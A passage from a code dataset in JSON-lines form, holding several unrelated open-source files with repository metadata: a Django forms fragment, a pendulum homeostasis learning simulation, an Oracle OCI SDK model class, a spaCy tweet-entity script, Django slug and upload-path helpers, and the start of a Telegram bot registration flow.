Weight = forms.CharField(max_length=5)\n class Meta: \n model = Meals\n fields = [\"Weight\"]\n\n\n\n\n\n", "repo_name": "Piotr-Lukaszewski/Fitapplication", "sub_path": "Main/Food/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 2740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 8, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.FloatField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms.FloatField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms.FloatField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 31, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 40, "usage_type": "name"}, {"api_name": "django.forms.NumberInput", "line_number": 40, "usage_type": "call"}, {"api_name": "django.forms.DecimalField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 41, "usage_type": "name"}, {"api_name": "models.Products", "line_number": 44, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 49, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 50, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 51, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 54, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 54, "usage_type": "name"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 63, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 63, "usage_type": "name"}, {"api_name": "models.Products.objects.all", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 64, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 65, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 65, "usage_type": "name"}, {"api_name": "models.Meals", "line_number": 70, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 73, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 74, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 74, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 76, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 76, "usage_type": "name"}, {"api_name": "models.Meals", "line_number": 86, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 89, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 90, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Meals", "line_number": 92, "usage_type": "name"}]} +{"seq_id": "13703931998", "text": "\"\"\"\r\nhomeostasis example according to playfulmachines, ca. pgs. 65-67. The numbers of the formulas in the comments correspond to the formulas in the book.\r\ncontrol timesteps (i.e. 2000) with --numsteps 2000\r\ncontrol mode with --mode animate|none to have a animation of the pendulum\r\ncontrol disturbance at 950 timesteps with --disturbance true|false\r\ncontrol disturbance_noise with --disturbance_noise 0.01\r\n\"\"\"\r\n\r\nimport argparse\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n# global variable\r\nx_ = 0\r\nline = 0\r\n\r\n\r\ndef animate(i):\r\n global x_\r\n line_x = np.zeros(2)\r\n line_y = np.zeros(2)\r\n numsteps = x_.shape[0]\r\n line_x[1] = x_.reshape(numsteps, -1)[i][0]\r\n line_y[1] = x_.reshape(numsteps, -1)[i][1]\r\n line.set_data(line_x, line_y)\r\n return line,\r\n\r\n\r\ndef init():\r\n line.set_data([], [])\r\n return line,\r\n\r\ndef main(args):\r\n global x_, line\r\n ndim_s = 2\r\n ndim_m = 1\r\n\r\n numsteps = args.numsteps\r\n mode = args.mode\r\n disturbance = args.disturbance\r\n disturbance_noise = args.disturbance_noise\r\n\r\n # system\r\n angle = np.random.uniform(- np.pi/8.0, + np.pi/8.0, size=(1,1))\r\n angleSpeed = np.ones_like(angle) * 0.0\r\n l = 1.5\r\n g = -0.01\r\n friction = 0.99\r\n motorTorque = 0.01\r\n\r\n # brain\r\n x = np.zeros((ndim_s, 1))\r\n xPred = np.zeros_like(x)\r\n xError = np.zeros_like(x)\r\n y = np.zeros((ndim_m, 1))\r\n\r\n A = np.zeros([ndim_s, ndim_m])\r\n b = np.zeros_like(x)\r\n\r\n C = np.random.uniform(-1e-1, 1e-1, size=(ndim_m, ndim_s))\r\n h = np.random.uniform(-1e-3, 1e-3, size=y.shape) # ones_like(y) * 0.1\r\n\r\n epsA = 0.05\r\n epsC = 0.15\r\n # global angle, angleSpeed, A, C, h, b, y\r\n\r\n # initialize logging variables\r\n x_ = np.zeros((numsteps,) + x.shape)\r\n xPred_ = np.zeros((numsteps,) + xPred.shape)\r\n xError_ = np.zeros((numsteps,) + xError.shape)\r\n y_ = np.zeros((numsteps,) + y.shape)\r\n A_ = np.zeros((numsteps,1) + A.shape)\r\n C_ = np.zeros((numsteps,1) + C.shape)\r\n angle_ = np.zeros((numsteps,) + angle.shape)\r\n angleSpeed_ = np.zeros((numsteps,) + angleSpeed.shape)\r\n\r\n\r\n\r\n for i in range(numsteps):\r\n\r\n # new measurement\r\n x[0][0] = np.sin(angle[0,0])\r\n x[1][0] = np.cos(angle[0,0])\r\n # print(\"x:\", x)\r\n\r\n\t # calculate prediction error\r\n xError = x - xPred\r\n # print(\"xError: \", xError)\r\n\r\n # Train Model\r\n dA = epsA * xError * y # formula 4.5\r\n A += dA\r\n db = epsA * xError # formula 4.6\r\n b += db\r\n\r\n\t # calculate norm from A for logging\r\n # Anorm = np.linalg.norm(A, 2)\r\n\r\n # print(\"|A| = %f, |dA| = %f\" % (Anorm, np.linalg.norm(dA, 2)))\r\n # print(\"|b| = %f, |db| = %f\" % (np.linalg.norm(b, 2), np.linalg.norm(db, 2)))\r\n\r\n # Train Controller\r\n z = np.dot(C, x) + h # formula 4.9+ this formula has some strange notion in the book which is a bit confusing. On page 81, this easy form of the formula is presented again.\r\n # print(\"z:\", z, z.shape)\r\n\r\n g_z = 1 - np.power(np.tanh(z),2) # formula 4.9+\r\n #print(\"g_z:\", g_z, g_z.shape)\r\n\r\n\r\n eta = np.dot(A.T, xError) * g_z # formula 4.9 does exactly the same than the long variant\r\n #print(\"eta:\", eta.shape)\r\n\r\n # eta = np.zeros_like(y)\r\n # for m in range(ndim_m):\r\n # for s in range(ndim_s):\r\n # eta[m] += A[s][m] * g_z[m][0] * xError[s][0]\r\n\r\n #print(eta_old - eta)\r\n #print(eta)\r\n #print(\"eta:\", eta.shape)\r\n #print(\"x:\",x)\r\n\r\n dC = epsC * np.dot(eta , x.T) # formula 4.7\r\n dh = epsC * eta # formula 4.8\r\n\r\n # print(\"dC.shape\", dC.shape)\r\n # dC = np.zeros_like(C)\r\n # dh = np.zeros_like(h)\r\n\r\n C += dC\r\n h += dh\r\n\r\n # Cnorm = np.linalg.norm(C, 2)\r\n\r\n # # print(\"A b C h:\", A, b, C, h)\r\n\r\n # Controler\r\n y = np.tanh(np.dot(C, x) + h) # formula 4.3\r\n #print(\"y:\", y)\r\n\r\n # Feed forward model\r\n # predict next sensor state\r\n xPred = np.dot(A, y) + b\r\n\r\n # angleSpeed += motorTorque * y[0][0]\r\n angleSpeed = motorTorque * np.reshape(y[0][0],(1,1))\r\n\r\n # friction\r\n angleSpeed *= friction\r\n\r\n # # gravity\r\n angleSpeed += np.cos(angle) * g\r\n\r\n # add disturbance after 1000 timesteps\r\n if(i % 1000 > 950 and disturbance):\r\n angleSpeed += 0.1\r\n\r\n if(disturbance_noise>0):\r\n angleSpeed += np.random.standard_normal(1) * disturbance_noise\r\n\r\n # calculate new position\r\n angle += angleSpeed\r\n\r\n if(angle > 2.0 * np.pi):\r\n angle -= 2.0 * np.pi\r\n if(angle < 0.0):\r\n angle += 2.0 * np.pi\r\n #angle = angleSpeed\r\n\r\n\r\n # logging\r\n x_[i] = x\r\n xPred_[i] = xPred\r\n xError_[i] = xError\r\n A_[i] = A\r\n C_[i] = C\r\n y_[i] = y\r\n angle_[i] = angle\r\n angleSpeed_[i] = angleSpeed\r\n\r\n # print(\"x_.shape\", x_.shape)\r\n\r\n\r\n plt.figure()\r\n plt.subplot(611)\r\n plt.plot([4]*numsteps, \"k--\", alpha=0.5, label = \"xP0\", linewidth=1.0)\r\n plt.plot(x_.reshape((numsteps, -1)), \"k-\", alpha=0.5, label=\"x\", linewidth=1.0)\r\n plt.plot(xPred_.reshape((numsteps, -1)) + 2, \"b-\", alpha=0.5, label=\"xP\", linewidth=1.0)\r\n plt.plot(xError_.reshape((numsteps, -1)) + 4, \"r-\", alpha=0.5, label=\"xE\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(612)\r\n plt.plot(y_.reshape((numsteps, -1)), \"k-\", label=\"y\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(613)\r\n plt.plot(angle_.reshape((numsteps, -1)), \"k-\", label=\"angle\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(614)\r\n plt.plot(angleSpeed_.reshape((numsteps, -1)), \"k-\", label=\"angledot\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(615)\r\n plt.plot(A_.reshape((numsteps, -1)), \"k-\", label=\"A\", linewidth=1.0)\r\n plt.legend()\r\n plt.subplot(616)\r\n plt.plot(C_.reshape((numsteps, -1)), \"k-\", label=\"C\", linewidth=1.0)\r\n plt.legend()\r\n\r\n if(mode == \"animate\"):\r\n # animate the pendulum\r\n fig = plt.figure(figsize=(8, 8))\r\n ax = plt.axes(xlim=(-2, 2), ylim=(-2, 2))\r\n line, = ax.plot([], [], lw=2)\r\n anim = animation.FuncAnimation(fig, animate, init_func=init, frames=numsteps, interval=20, blit=True)\r\n\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-ns\", \"--numsteps\", type=int, default=2000)\r\n parser.add_argument(\"-m\", \"--mode\", type=str, default = \"none\")\r\n parser.add_argument(\"-d\", \"--disturbance\", type=bool, default = False)\r\n parser.add_argument(\"-dn\", \"--disturbance_noise\", type=float, default=0.0)\r\n args = parser.parse_args()\r\n main(args)\r\n", "repo_name": "AndreasGerken/selfRegulation", "sub_path": "python/pendulum_homeostasis.py", "file_name": "pendulum_homeostasis.py", "file_ext": "py", "file_size_in_byte": 6808, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 168, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "31584512459", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass AuditTrailDimensions(object):\n \"\"\"\n Details of aggregation dimensions used for summarizing audit trails.\n \"\"\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"INACTIVE\"\n LIFECYCLE_STATE_INACTIVE = \"INACTIVE\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"UPDATING\"\n LIFECYCLE_STATE_UPDATING = \"UPDATING\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"ACTIVE\"\n LIFECYCLE_STATE_ACTIVE = \"ACTIVE\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"DELETING\"\n LIFECYCLE_STATE_DELETING = \"DELETING\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"FAILED\"\n LIFECYCLE_STATE_FAILED = \"FAILED\"\n\n #: A constant which can be used with the lifecycle_state property of a AuditTrailDimensions.\n #: This constant has a value of \"NEEDS_ATTENTION\"\n LIFECYCLE_STATE_NEEDS_ATTENTION = \"NEEDS_ATTENTION\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new AuditTrailDimensions object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param location:\n The value to assign to the location property of this AuditTrailDimensions.\n :type location: str\n\n :param lifecycle_state:\n The value to assign to the lifecycle_state property of this AuditTrailDimensions.\n Allowed values for this property are: \"INACTIVE\", \"UPDATING\", \"ACTIVE\", \"DELETING\", \"FAILED\", \"NEEDS_ATTENTION\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type lifecycle_state: str\n\n :param status:\n The value to assign to the status property of this AuditTrailDimensions.\n :type status: str\n\n :param target_id:\n The value to assign to the target_id property of this AuditTrailDimensions.\n :type target_id: str\n\n \"\"\"\n self.swagger_types = {\n 'location': 'str',\n 'lifecycle_state': 'str',\n 'status': 'str',\n 'target_id': 'str'\n }\n\n self.attribute_map = {\n 'location': 'location',\n 'lifecycle_state': 'lifecycleState',\n 'status': 'status',\n 'target_id': 'targetId'\n }\n\n self._location = None\n self._lifecycle_state = None\n self._status = None\n self._target_id = None\n\n @property\n def location(self):\n \"\"\"\n Gets the location of this AuditTrailDimensions.\n The location represents the source of audit records that provides documentary evidence of the sequence of activities in the target database.\n\n\n :return: The location of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location):\n \"\"\"\n Sets the location of this AuditTrailDimensions.\n The location represents the source of audit records that provides documentary evidence of the sequence of activities in the target database.\n\n\n :param location: The location of this AuditTrailDimensions.\n :type: str\n \"\"\"\n self._location = location\n\n @property\n def lifecycle_state(self):\n \"\"\"\n Gets the lifecycle_state of this AuditTrailDimensions.\n The current state of the audit trail.\n\n Allowed values for this property are: \"INACTIVE\", \"UPDATING\", \"ACTIVE\", \"DELETING\", \"FAILED\", \"NEEDS_ATTENTION\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The lifecycle_state of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._lifecycle_state\n\n @lifecycle_state.setter\n def lifecycle_state(self, lifecycle_state):\n \"\"\"\n Sets the lifecycle_state of this AuditTrailDimensions.\n The current state of the audit trail.\n\n\n :param lifecycle_state: The lifecycle_state of this AuditTrailDimensions.\n :type: str\n \"\"\"\n allowed_values = [\"INACTIVE\", \"UPDATING\", \"ACTIVE\", \"DELETING\", \"FAILED\", \"NEEDS_ATTENTION\"]\n if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):\n lifecycle_state = 'UNKNOWN_ENUM_VALUE'\n self._lifecycle_state = lifecycle_state\n\n @property\n def status(self):\n \"\"\"\n Gets the status of this AuditTrailDimensions.\n The current sub-state of the audit trail..\n\n\n :return: The status of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"\n Sets the status of this AuditTrailDimensions.\n The current sub-state of the audit trail..\n\n\n :param status: The status of this AuditTrailDimensions.\n :type: str\n \"\"\"\n self._status = status\n\n @property\n def target_id(self):\n \"\"\"\n Gets the target_id of this AuditTrailDimensions.\n The OCID of the Data Safe target for which the audit trail is created.\n\n\n :return: The target_id of this AuditTrailDimensions.\n :rtype: str\n \"\"\"\n return self._target_id\n\n @target_id.setter\n def target_id(self, target_id):\n \"\"\"\n Sets the target_id of this AuditTrailDimensions.\n The OCID of the Data Safe target for which the audit trail is created.\n\n\n :param target_id: The target_id of this AuditTrailDimensions.\n :type: str\n \"\"\"\n self._target_id = target_id\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/data_safe/models/audit_trail_dimensions.py", "file_name": "audit_trail_dimensions.py", "file_ext": "py", "file_size_in_byte": 6443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 128, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 181, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "5715898895", "text": "\"\"\"Engine to extract information from tweets.\"\"\"\nimport spacy\nimport json\nimport os\nimport ijson\n\nnlp = spacy.load('en')\n\ndef extract_ents(doc):\n \"\"\"Extract entities from the Spacy NLP document.\"\"\"\n for ent in doc.ents:\n yield ent\n\nif __name__ == '__main__':\n texts = [\n u\"GM L'Enfant! The truck is back on 7th & Maryland Ave, NW (11-1:30)\",\n u\"The truck's on L between 19th & 20th (11-1:30)\",\n u\"The truck will be @NavyFederal 820 Follin Ln, Vienna, Va ⌚️11-2:00\"\n ]\n if os.path.exists('tweets.json'):\n with open('tweets.json') as tweets_file:\n tweets = json.load(tweets_file)\n# print('loading')\n# tweets = ijson.items(tweets_file, '')\n# print('done')\n texts = [tweet['text'] for tweet in tweets]\n for i, doc in enumerate(nlp.pipe(texts, batch_size=50, n_threads=4)):\n print(\"{}: {}\".format(doc, doc.is_parsed))\n for ent in extract_ents(doc):\n print('-->', ent.label_, ent)\n", "repo_name": "dwyerk/fett", "sub_path": "nlp/engine.py", "file_name": "engine.py", "file_ext": "py", "file_size_in_byte": 1012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "spacy.load", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "5555036900", "text": "import random, string, os\nfrom django.utils.text import slugify\n\ndef random_string_generator(size):\n return ''.join([random.choice(string.ascii_lowercase) for i in range(size)])\n# get extension of any file\ndef get_file_ext(filepath):\n basename = os.path.basename(filepath)\n name, ext = os.path.splitext(basename)\n return name, ext\n\n# get image path for upload image\ndef upload_image_path(instance, filename):\n new_filename = random_string_generator(16)\n name, ext = get_file_ext(filename)\n final_filename = f'{new_filename}{ext}'\n return f'products/{final_filename}'\n\ndef unique_slug_generator(instance, new_slug=None):\n \"\"\"\n This is for a Django project and it assumes your instance\n has a model with a slug field and a title character (char) field.\n \"\"\"\n if new_slug is not None:\n slug = new_slug\n else:\n slug = slugify(instance.title)\n\n Klass = instance.__class__\n qs_exists = Klass.objects.filter(slug=slug).exists()\n if qs_exists:\n new_slug = \"{slug}-{randstr}\".format(\n slug=slug,\n randstr=random_string_generator(size=4)\n )\n return unique_slug_generator(instance, new_slug=new_slug)\n return slug", "repo_name": "MuhammadSaim/django-ecommerce", "sub_path": "products/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.choice", "line_number": 5, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.utils.text.slugify", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "11069631134", "text": "from telegram import Update\nfrom telegram.ext import CallbackContext\nfrom Buttons import *\nfrom database import *\n\n\ndef start(update:Update, context:CallbackContext):\n print('Asalomu alaykum')\n if chek_user(update.effective_user.id):\n update.message.reply_text(\"Salom\",reply_markup=main_buttons())\n return 'state_main'\n update.message.reply_text(\"Assalomu alaykum Botimizga xush kelibsiz\\n\"\n \"Ro'yxatdan o'tish uchun FIO ni yuboring\", reply_markup=ReplyKeyboardRemove())\n return 'state_name'\n\ndef command_name(update:Update, context:CallbackContext):\n text = update.message.text\n update.message.reply_text(\"Sizning ismi familyangiz \"+text+\"\\n\"\n \"Yaxshi endi telefon raqamingizni yuboring\", reply_markup=phone_button())\n context.user_data['name'] = text\n return 'state_phone'\n\ndef command_phone(update:Update, context:CallbackContext):\n try:\n contact = update.message.contact\n phone_number = contact.phone_number\n except Exception as e:\n phone=update.message.text\n if (phone[0]=='+' and len(phone)==13 and (phone[1:4]=='998') or phone[:3]=='998' and len(phone)==12) or (len(phone)==9):\n phone_number=phone\n else:\n update.message.reply_text('Siz telfon raqamingizni xato kiritizgiz qayat UZB nomer kiritib koring:')\n return 'state_phone'\n\n context.user_data['phone'] = phone_number\n update.message.reply_text(f\"Sizning Ismingiz: {context.user_data['name']}\\n\"\n f\"Sizning telefon raqamingiz: {phone_number}\\n\"\n f\"Endi esa viloyatingizni kiriting?\")\n return 'state_viloyat'\n\ndef command_viloyat(update:Update, context:CallbackContext):\n text = update.message.text\n update.message.reply_html(f\"Sizning ism familyangiz : <b>{context.user_data['name']}</b>\\n\"\n f\"Sizning raqamingiz: <b>{context.user_data['phone']}</b>\\n\"\n f\"Siznig viloyatingiz: <b>{text}</b>\\n\"\n f\"<b><i>Siz mufaqiyatli ro'yxatdan o'tingiz</i></b>\")\n update.message.reply_html(\" Buyurtmani birga joylashtiramiz\",reply_markup=main_buttons())\n 